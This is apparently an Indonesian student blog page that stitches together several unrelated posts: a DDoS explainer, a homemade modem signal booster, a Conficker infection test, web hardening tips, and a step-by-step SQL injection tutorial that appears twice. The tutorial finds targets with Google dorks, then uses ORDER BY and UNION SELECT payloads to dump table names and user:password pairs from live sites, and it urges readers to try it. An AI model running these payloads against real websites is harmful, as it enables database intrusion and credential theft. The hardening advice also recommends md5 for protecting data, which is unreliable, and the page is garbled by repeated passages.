Attacker = Hacker
Master = Server Computer skala kecil (Contoh Server Warnet)
Slaves = Personal Computer yang terinfeksi virus/trojan DDoS
Victim DNS Server = www. target.com
Contoh skala kecil di Lab Linux BSI tentang DDoS
20 PC Mahasiswa ping ke PC Dosen, walaupun tidak akan terasa karena beban yang kecil tetapi ini sudah termasuk serangan DDoS skala kecil
bayangkan jika ada 1000 PC/Komputer ping ke Komputer Dosen, sudah di pastikan akan memperberat kinerja komputer dosen tersebut
Nah untuk melangsungkan serangan DDoS Skala Besar untuk Mainframe Komputer, maka seorang Hacker akan memanfaatkan sebuah program trojan/virus untuk membuat komputer zombie. Komputer Zombie akan melakukan ping ke komputer server tersebut, semakin banyak komputer zombie maka akan semakin besar pula dampaknya ke server tersebut
Bekasi System Information
Senin, 19 Desember 2011
Minggu, 18 Desember 2011
Penguat Sinyal Modem Sederhana
1. Sendok (sendok makan,usahakan yg materialnya agak tipis ya gan )
2. Tutup kaleng Biskuit sama pengait kertas buat penjepit Modem
3. Jangan Lupa Modemnya ya gan
4. Kabel USB
5. Kaleng Parfum
?... Tenang ajah masih ada petunjuk lg kok
ah ini gambar bahan-bahannya:
Barang kali agan bingung jadi ane liatin
Cara Buat'nya :
1. Sendok ditekuk seperti pada gambar,tujuannya untuk menjepit Modem agan tp jangan terlalu sempit ntar modem Agan Lecet malah rusak.
Jangan nyuri sendok tetangga yah Gan, tar panjang urusannya...
2. Tutup kaleng biskuit yang dilem dengan penjepit ketas tapi ingat
penjepit kertas'nya udah direnggangin supaya tidak terlalu keras saat
mencepit Modemnya.
3. Kaleng Parfum yg berfungsi seperti antena trs letakan didekat modem.
4. Jangan lupa bagi modem yg cepat panas antisipasi dengan dikipas.
5. Cari posisi yg bagus,liat perubahan sinyalnya.
6. Selamat Mencoba semoga bermanfaat.
Nah trus dirangkai seperti gambar :
Nah kalo berhasil Sinyal Modem bisa jadi :
1. Sendok ditekuk seperti pada gambar,tujuannya untuk menjepit Modem agan tp jangan terlalu sempit ntar modem Agan Lecet malah rusak.
Jangan nyuri sendok tetangga yah Gan, tar panjang urusannya...
Barang gini ternyata bermanfaat & Sakti juga
3. Kaleng Parfum yg berfungsi seperti antena trs letakan didekat modem.
4. Jangan lupa bagi modem yg cepat panas antisipasi dengan dikipas.
5. Cari posisi yg bagus,liat perubahan sinyalnya.
6. Selamat Mencoba semoga bermanfaat.
Nah trus dirangkai seperti gambar :
Spoiler for Rangkaian:
Spoiler for Signal Sebelum:MISKIN HSDPA
Dirangkai kayak gini ya gan,biar mirip kaya punya Ane
Dulu sebelum make ini : Spoiler for Signal Sebelum:MISKIN HSDPA
Nah kalo berhasil Sinyal Modem bisa jadi :
Spoiler for Signal Sesudah: FULL HSDPA
Nah sekarang ane liatin kecepatan Downloads'nya , meski kecil tp lumayan buat nemenin bengong di KOST (alias sambil Downloads Film)
Spoiler for Downloads Sebelum make:
Dulu downloads file segitu ajah bisa sambil ngrokok 1 batang
Spoiler for Downloads Sesudah make: Sekarang udah Bisa
Dulu downloads file segitu ajah bisa sambil ngrokok 1 batang
Spoiler for Downloads Sesudah make: Sekarang udah Bisa
Test Conficker
Virus Conficker yang
juga dikenal dengan nama Kido atau
Downadup rasanya sudah pasti akrab di telinga administrator komputer di tahun
2009 ini. Salah
satu jenis virus berkategori worm yang melakukan penyebaran yang sangat dahsyat
dan memiliki dampak yang
sangat
serius
bagi komputer di
jaringan.
Conficker (alias Downadup, Kido) dikenal memblokir akses ke lebih dari 100 anti-virus dan keamanan situs.
Jika Anda diblokir dari memuat gambar terpencil di baris pertama dari tabel teratas di atas (AV / keamanan situs) tetapi tidak diblokir dari memuat gambar pada baris kedua (website alternatif dari sistem operasi) maka PC Windows Anda dapat terinfeksi oleh Conficker (atau beberapa perangkat lunak berbahaya lainnya).
Jika Anda dapat melihat semua enam gambar di kedua baris tabel atas, Anda baik tidak terinfeksi oleh Conficker, atau Anda mungkin menggunakan proxy server, dalam hal ini Anda tidak akan dapat menggunakan tes ini untuk membuat tekad yang akurat, karena Conficker akan mampu blok Anda dari melihat AV / situs keamanan.
Untuk Mengetahui Komputer Anda Terinfeksi Virus Conficker atau tidak silahkan click DISINI
Test ini sangat mudah dan tidak perlu waktu yang lama
Penjelasan Hasil Test:
Jika anda melihat ini: | maka kemungkinan komputer anda: |
---|---|
= Normal/Tidak terinfeksi oleh Conficker (atau menggunakan proxy) | |
= Kemungkinan Besar Terinfeksi Conficker (C variant atauLebih Berbahaya)
| |
= Kemungkinan Besar terinfeksi Conficker A/B variant
| |
= Check kembali koneksi internet anda? | |
Jika Muncul Kombinasi ini | = Koneksi Internet yang jelek? |
Jika Anda diblokir dari memuat gambar terpencil di baris pertama dari tabel teratas di atas (AV / keamanan situs) tetapi tidak diblokir dari memuat gambar pada baris kedua (website alternatif dari sistem operasi) maka PC Windows Anda dapat terinfeksi oleh Conficker (atau beberapa perangkat lunak berbahaya lainnya).
Jika Anda dapat melihat semua enam gambar di kedua baris tabel atas, Anda baik tidak terinfeksi oleh Conficker, atau Anda mungkin menggunakan proxy server, dalam hal ini Anda tidak akan dapat menggunakan tes ini untuk membuat tekad yang akurat, karena Conficker akan mampu blok Anda dari melihat AV / situs keamanan.
Untuk Mengetahui Komputer Anda Terinfeksi Virus Conficker atau tidak silahkan click DISINI
Test ini sangat mudah dan tidak perlu waktu yang lama
Mencegah SQL Injection
Pengamanan Web Server Dan Site (Versi SQL Injection, JS, XSS, CSS)
Percaya atau tidak kalau mengamankan web itu lebih
sulit daripada merusak tampilan atau merusak database dari web tersebut.
Maraknya deface dan hacking yg dilakukan oleh beberapa orang yg
dikarenakan kesalahan konfigurasi system atau kurangnya pengetahuan
webmaster masih sering dilakukan.
1. Pencegahan SQL Injection, contoh sintak SQL Injection :?or 1=1–
Penyerangan melalui teknik ini sama artinya dng penyerangan terhadap database. Untuk melakukan pencegahan terhadap SQL Injection ini, pertama seperti kita ketahui karakter ( ? ), (–), (NULL), (\x00), (\n), (\r), (?), (/), (/x1a) merupakan biang masalah dari SQL ini, tips nya yaitu escape semua special karakter tersebut untuk php/mysql:
mysql_real_escape_string. Atau dengan cara kedua yaitu filter semua karakter yang masuk dan hanya mengijinkan karakter ttt yg dpt di inputkan. Yg perlu diingat, Sql injection ini tidak hanya bisa masuk melalui inputan dari user tetapi juga bisa melalui URL dengan bantuan karakter ( ; ) yang arti dari karakter itu adalah ?baris dibelakang ; akan ikut di eksekusi?. Disarankan, abaikan semua karakter setelah alamat URL. Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function
2. Pencegahan XSS (Cross Side Scripting), contoh script XSS :
Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal…..! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.
Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal…..! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.
3. Pemasukkan Tag HTML.
Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars).
Contoh script :Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars).
function cleanup($value=”", $preserve=”", $tag=”") {
if (empty($preserve)) {
$value=strip_tags($value, $allowed_tags);
}
$value=htmlspecialchars($value);
return $value;
}
4. Batasi penggunaan Java Script dan jangan
menggunakan java script untuk membuat sesuatu yang akan meyangkut hidup
matinya web anda, karena java script bersifat client dan membuat akses
yang akan sangat lambat. Disarankan gunakan aplikasi yang lain seperti
PHP dan ASP karena sudah bersifat server.
5. Penyimpanan file database sebaiknya disimpan dlm
directory private. Jangan pernah menyimpannya di directory public yang
memungkinkan orang lain dapat mengaksesnya. Tapi biasanya di web hosting
sudah menyediakan direktori khusus untuk database. Dalam keamanan
database harus dilindungi dengan password. Koneksi sebaiknya di enkripsi
dengan SSL. Data yang penting jangan disimpan secara langsung melainkan
sebagai hash (md5) atau modifikasi dari md5 yaitu SHA-256 dan SHA-512
atau terenkripsi dengan bahasa pemrograman lain misalnya PHP.
6. Berhati hatilah memilih webhosting, itu sudah kami
buktikan. Sehebat apapun web yang dibuat walaupun pengecekan password
dibuat 2 kali dan di encrypt berapa kalipun kalau sudah server yang
diserang kita tidak bisa berbuat apa apa.
SQL Injection
sql injection adalah serangan
yang memanfaatkan kelalaian dari website, dan juga sebuah aksi hacking
yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL
yang ada di memori aplikasi client, dan juga sql injection merupakan
teknik mengeksploitasi qwb aplikasi yang didalamnya menggunakan database
untuk penyimpanan data
Cara-cara SQL injection:
=> cari target web yang ingin di sql injection dengan cara serching di google dengan menggunakan kata kunci, contohnya sebagai berikut
>>inurl:trainers.php?id=
>>inurl:buy.php?category=
>>inurl:article.php?ID=
>>inurl:play_old.php?id=
>>inurl:declaration_more.php?decl_id=
=> nah, jika sudah memilih web yang ingn di sql injection, untuk mengecek apakah web tersebut bisa di sql injection yaitu dengan cara menambahkan di urlnya yang terakhir dengan simbol petik satu('), jika terjadi error sql, maka web tersebut bisa di sql injection.
example:(http://testsql.com/news.php?id=321')
=> langkah selanjutnya, adalah hapus tanda petik yang tadi, kemudian di tambahkan kata order by 1--, ini berfungsi untuk mencari kesalahan pada web tersebut, intinya kita mencari error pada web tersebut, jika sudah menemukan error maka yang diambil nilai sebelum error.
example:
(http://testsql.com/news.php?id=321 order by 1-- no error )
(http://testsql.com/news.php?id=321 order by 2-- no error )
(http://testsql.com/news.php?id=321 order by 3-- no error )
(http://testsql.com/news.php?id=321 order by 4-- no error )
(http://testsql.com/news.php?id=321 order by 5-- no error )
(http://testsql.com/news.php?id=321 order by 6-- no error )
(http://testsql.com/news.php?id=321 order by 7-- error )
nah berati yang diambil yang ini http://testsql.com/news.php?id=321 order by 6--
=> kemudian anda ganti order by nya dengan union all select, kemudian angka 6 nya di jabarkan satu per satu seperti 1,2,3,4,5,6 dan di depan angka sesudah = anda tambahkan -, jadi contohnya seperi ini.
(http://testsql.com/news.php?id=-321 union all select 1,2,3,4,5,6--)
=> nanti akan muncul angka-angka, anda ambil salah satu jah, tapi menurut saya ambil angka yang paling atas, kemudian pada url'a, pada angka yang tertera anda ganti dengan @@version, ini berfungsi untuk menampilkan versi mysql, kita disini akan menjeaskan sql injection dengan menggunakan mysql versi 5, misalkan ada angka 3, nah angka 3 nya anda ganti dengan @@version.
example :(http://testsql.com/news.php?id=-321 union all select 1,2,@@version,4,5,6--)
=> kemudian nanti ankan muncul angka, angka tersebut merupakan keterangan versi mysql yang digunakan web tersebut, jika keluarnya 5.0.1 maka kita bisa mengsql injection web tersebut.., langsung jah, yang @@version anda ganti dengan group_concat(table_name) lalu pada akhir url sebelum -- anda tambahkan dengan from information_schema.tables where table_schema=databses().
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--)
=> kemudian akan muncul beberapa tulisan, kita cari yang berhubungan dengan admin / user, karena kita disini mencari table user / admin, jika sudah nemu kata admin / user, langkah selanjutnya kata admin / user anda convert menjadi hex, bisa menggunkan web disini http://www.string-functions.com/string-hex.aspx (hasil dari convert hex user = 75736572), jika sudah, langkah selanjutnya adalah mengganti kata databse() dengan hasil conver hex yang tadi dan ditambahkan dengan 0x(misalkan kita ambil kata user), kemudian ganti kata table yang ada di dalam kurung menjadi column dan kata tables diganti dengan columns, lalu kata table_schema, kata schemanya itu di ganti dengan kata name.
example: (http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x75736572--)
=> nanti akan muncul hasil dari table yang dicari, biasanya yang keluar adalah user dan password, maka kata user dan password anda copy, lalu kata column_name yang ada di dalam kurung anda ganti dengan user dan password, dimana ditengah-tengah user dan password ditambahkan kata 0x3a, lalu yang hasil hex nya diganti dengan kata sebelum di convert ke hex(misalkan awalanya tadi ambil kata user, nah kita ganti dengan kata user) kata information'a anda hapus sampai sama dengan (=).
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(user,0x3a,password),4,5,6 from user--)
=> nanti akan muncul user dan password(biasanya password tidak dalam bentuk string).
SELAMAT MENCOBA
sumber
Cara-cara SQL injection:
=> cari target web yang ingin di sql injection dengan cara serching di google dengan menggunakan kata kunci, contohnya sebagai berikut
>>inurl:trainers.php?id=
>>inurl:buy.php?category=
>>inurl:article.php?ID=
>>inurl:play_old.php?id=
>>inurl:declaration_more.php?decl_id=
=> nah, jika sudah memilih web yang ingn di sql injection, untuk mengecek apakah web tersebut bisa di sql injection yaitu dengan cara menambahkan di urlnya yang terakhir dengan simbol petik satu('), jika terjadi error sql, maka web tersebut bisa di sql injection.
example:(http://testsql.com/news.php?id=321')
=> langkah selanjutnya, adalah hapus tanda petik yang tadi, kemudian di tambahkan kata order by 1--, ini berfungsi untuk mencari kesalahan pada web tersebut, intinya kita mencari error pada web tersebut, jika sudah menemukan error maka yang diambil nilai sebelum error.
example:
(http://testsql.com/news.php?id=321 order by 1-- no error )
(http://testsql.com/news.php?id=321 order by 2-- no error )
(http://testsql.com/news.php?id=321 order by 3-- no error )
(http://testsql.com/news.php?id=321 order by 4-- no error )
(http://testsql.com/news.php?id=321 order by 5-- no error )
(http://testsql.com/news.php?id=321 order by 6-- no error )
(http://testsql.com/news.php?id=321 order by 7-- error )
nah berati yang diambil yang ini http://testsql.com/news.php?id=321 order by 6--
=> kemudian anda ganti order by nya dengan union all select, kemudian angka 6 nya di jabarkan satu per satu seperti 1,2,3,4,5,6 dan di depan angka sesudah = anda tambahkan -, jadi contohnya seperi ini.
(http://testsql.com/news.php?id=-321 union all select 1,2,3,4,5,6--)
=> nanti akan muncul angka-angka, anda ambil salah satu jah, tapi menurut saya ambil angka yang paling atas, kemudian pada url'a, pada angka yang tertera anda ganti dengan @@version, ini berfungsi untuk menampilkan versi mysql, kita disini akan menjeaskan sql injection dengan menggunakan mysql versi 5, misalkan ada angka 3, nah angka 3 nya anda ganti dengan @@version.
example :(http://testsql.com/news.php?id=-321 union all select 1,2,@@version,4,5,6--)
=> kemudian nanti ankan muncul angka, angka tersebut merupakan keterangan versi mysql yang digunakan web tersebut, jika keluarnya 5.0.1 maka kita bisa mengsql injection web tersebut.., langsung jah, yang @@version anda ganti dengan group_concat(table_name) lalu pada akhir url sebelum -- anda tambahkan dengan from information_schema.tables where table_schema=databses().
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--)
=> kemudian akan muncul beberapa tulisan, kita cari yang berhubungan dengan admin / user, karena kita disini mencari table user / admin, jika sudah nemu kata admin / user, langkah selanjutnya kata admin / user anda convert menjadi hex, bisa menggunkan web disini http://www.string-functions.com/string-hex.aspx (hasil dari convert hex user = 75736572), jika sudah, langkah selanjutnya adalah mengganti kata databse() dengan hasil conver hex yang tadi dan ditambahkan dengan 0x(misalkan kita ambil kata user), kemudian ganti kata table yang ada di dalam kurung menjadi column dan kata tables diganti dengan columns, lalu kata table_schema, kata schemanya itu di ganti dengan kata name.
example: (http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x75736572--)
=> nanti akan muncul hasil dari table yang dicari, biasanya yang keluar adalah user dan password, maka kata user dan password anda copy, lalu kata column_name yang ada di dalam kurung anda ganti dengan user dan password, dimana ditengah-tengah user dan password ditambahkan kata 0x3a, lalu yang hasil hex nya diganti dengan kata sebelum di convert ke hex(misalkan awalanya tadi ambil kata user, nah kita ganti dengan kata user) kata information'a anda hapus sampai sama dengan (=).
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(user,0x3a,password),4,5,6 from user--)
=> nanti akan muncul user dan password(biasanya password tidak dalam bentuk string).
SELAMAT MENCOBA
sumber
Langganan:
Postingan (Atom)